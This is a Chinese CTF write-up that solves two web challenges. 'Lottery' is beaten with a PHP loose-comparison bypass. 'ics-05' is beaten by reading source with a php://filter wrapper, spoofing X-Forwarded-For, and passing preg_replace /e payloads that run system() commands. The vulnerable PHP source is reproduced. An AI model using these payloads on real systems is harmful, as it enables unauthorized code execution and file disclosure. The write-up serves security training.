Web 安全实战：PHP 弱类型与正则替换漏洞分析

关键点在于使用两个等号 == 来判断传入的数字和随机生成的数字。由于未检查类型，可以直接利用 PHP 的弱类型比较特性绕过验证。

将 numbers 字段改为 [true,true,true,true,true,true,true]。

成功利用弱类型得到奖金并拿到 flag。

二：ics-05

打开页面如下所示，随便点击发现只有此页面可打开，但是好像什么都没有。

打开页面源代码查看，发现一个 href 可点。

打开链接页面，修改其为 index.php 回显 ok。既然这样，如果我们能够读取到这个 index.php 应该就可以拿到 flag。

读取文件使用伪协议：

php://filter/read=convert.base64-encode/resource=index.php

复制这个 base64 然后解密。

打开代码后观察，如果 ip 为 127.0.0.1 就是 admin，然后还有一个 preg_replace 方法，pattern 第一个参数的结尾包含了 /e 修正符的话，第二个参数就会被当做 php 代码执行。

打开抓包工具，修改 IP 后为 admin。

然后添加三个参数：

?pat=/heihei/e&rep=system('find+-name+flag')&sub=heihei

需要使用 + 置换空格，得到 flag.php。

成功拿到 flag，但注意 flag 不在页面渲染中显示。

?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei

解密后的 index.php 代码

<?php error_reporting(0); @session_start(); posix_setuid(1000); ?> <!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="layui/css/layui.css" media="all"> <title>设备维护中心</title> <meta charset="utf-8"> </head> <body> <ul> <li><a href="?page=index">云平台设备维护中心</a></li> </ul> <fieldset> <legend>设备列表</legend> </fieldset> <table></table> <script type="text/html"> <!-- 这里的 checked 的状态只是演示 --> <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开 | 关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}> </script> <script src="layui/layui.js" charset="utf-8"></script> <script> layui.use('table', function() { var table = layui.table, form = layui.form; table.render({ elem: '#test', url: '/somrthing.json', cellMinWidth: 80, cols: [ [ { type: 'numbers' }, { type: 'checkbox' }, { field: 'id', title: 'ID', width: 100, unresize: true, sort: true }, { field: 'name', title: '设备名', templet: '#nameTpl' }, { field: 'area', title: '区域' }, { field: 'status', title: '维护状态', minWidth: 120, sort: true }, { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true } ] ], page: true }); }); </script> <script> layui.use('element', function() { var element = layui.element; //导航的 hover 效果、二级菜单等功能，需要依赖 element 模块 //监听导航点击 element.on('nav(demo)', function(elem) { //console.log(elem) layer.msg(elem.text()); }); }); </script> <?php $page = $_GET[page]; if (isset($page)) { if (ctype_alnum($page)) { ?> <br /><br /><br /><br /> <div> <p><?php echo $page; die();?></p> <br /><br /><br /><br /> <?php }else{ ?> <br /><br /><br /><br /> <div> <p> <?php if (strpos($page, 'input') > 0) { die(); } if (strpos($page, 'ta:text') > 0) { die(); } if (strpos($page, 'text') > 0) { die(); } if ($page === 'index.php') { die('Ok'); } include($page); die(); ?> </p> <br /><br /><br /><br /> <?php }} //方便的实现输入输出的功能，正在开发中的功能，只能内部人员测试 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "<br >Welcome My Admin ! <br >"; $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?> </body> </html>

三：总结

本文通过两个 Web 题目演示了如何利用代码审计和漏洞挖掘技术获取 flag。在 Lottery 题目中，通过分析网站的猜数字游戏功能，发现使用 PHP 的弱类型比较漏洞，成功绕过验证并获取奖金和 flag。在 ics-05 题目中，通过修改 IP 地址和利用 PHP 的 preg_replace 函数执行系统命令，成功读取并解密 index.php 文件，最终获取 flag。